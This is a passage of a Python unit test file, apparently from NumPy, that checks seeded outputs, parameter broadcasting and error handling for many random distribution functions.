def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
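# Illustrative sketch (not an upstream test) of the broadcasting behaviour that
# TestBroadcast below exercises: array-valued parameters are broadcast against
# each other, so a length-3 `loc` with a length-1 `scale` yields three draws.
def _example_param_broadcasting():
    rs = random.RandomState(123456789)
    draws = rs.normal(loc=[0., 0., 0.], scale=[1.])
    assert draws.shape == (3,)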
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
